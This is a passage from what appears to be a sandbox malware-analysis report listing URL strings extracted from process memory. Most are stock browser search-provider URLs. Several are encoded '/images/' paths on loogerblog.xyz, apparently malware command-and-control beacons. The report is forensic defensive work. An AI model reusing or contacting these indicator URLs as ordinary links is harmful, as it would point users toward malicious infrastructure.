Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/favicon.ico
Source: explorer.exe, 0000001E.00000000.499102380.0000000008455000.00000004.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAn
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnf
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp	String found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000017.00000002.521630583.0000028A00001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000002.691931764.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
